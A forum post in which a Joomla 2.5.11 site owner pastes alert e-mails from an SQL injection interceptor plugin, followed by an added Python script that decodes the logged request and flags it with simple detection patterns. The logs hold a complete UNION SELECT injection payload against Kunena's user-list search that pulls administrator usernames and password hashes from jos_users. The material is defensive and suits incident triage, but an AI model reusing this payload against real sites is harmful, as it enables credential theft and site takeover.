Some time ago I installed this plugin, Marco's SQL Injection - LFI Interceptor. Now I have received three e-mails with the content shown below, and in addition I found modules and plugins in the administrator panel marked with the classic padlock. What does it mean? Do you have any advice?
Joomla! 2.5.11
** Union Select [GET:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ;
** Table name in url [GET:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ;
** Union Select [REQUEST:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ;
** Table name in url [REQUEST:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR : 178.33.80.217
*HTTP_USER_AGENT : MySuperBot 1.02
*REQUEST_METHOD : GET
*QUERY_STRING : option=com_kunena&func=userlist&search=%25%27+and+1=2%29+union+select+1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--+;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ;
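To read an alert like the one quoted above, the following added example (not part of the original post and not the plugin's own code) decodes the logged QUERY_STRING, names the component and parameter involved, and turns the `0x..` hex literals back into text. The function names and the three regular expressions are assumptions made for this illustration; they only approximate the plugin's "Union Select" and "Table name in url" rules.

```python
import re
from urllib.parse import parse_qs

# QUERY_STRING copied from the alert e-mail quoted in the post above.
QUERY_STRING = (
    "option=com_kunena&func=userlist&search=%25%27+and+1=2%29+union+select+"
    "1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15+"
    "from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--+;"
)

# Simplified stand-ins for the plugin's rules (assumption, not its real patterns).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b", re.I)
TABLE_REF = re.compile(r"\bfrom\s+([a-z0-9]+_[a-z0-9_]+)", re.I)


def decode_hex_literals(value):
    """Map each MySQL-style 0x.. literal in value to the string it encodes."""
    return {
        m.group(0): bytes.fromhex(m.group(1)).decode("latin-1")
        for m in HEX_LITERAL.finditer(value)
    }


def triage(query_string):
    """Summarise one logged request: component, view, and flagged parameters."""
    params = {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}
    report = {"component": params.get("option"), "view": params.get("func"), "findings": []}
    for name, value in params.items():
        rules = []
        if UNION_SELECT.search(value):
            rules.append("union select")
        table = TABLE_REF.search(value)
        if table:
            rules.append("table " + table.group(1))
        if rules:
            report["findings"].append(
                {"param": name, "rules": rules, "decoded": decode_hex_literals(value)}
            )
    return report


if __name__ == "__main__":
    result = triage(QUERY_STRING)
    print("component:", result["component"], "view:", result["view"])
    for finding in result["findings"]:
        print(finding["param"], finding["rules"], finding["decoded"])
```

The output shows that the request was aimed at the `search` parameter of the `com_kunena` user list and that the long hex literal decodes to `Super Administrator`, i.e. the query was written to read administrator rows from `jos_users`.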
Copyleft: All material published on or otherwise present within the site www.joomla.it may be freely used, distributed and modified. Hosting provided free of charge by Joomlahost.it. Web design by kreatif multimedia srl.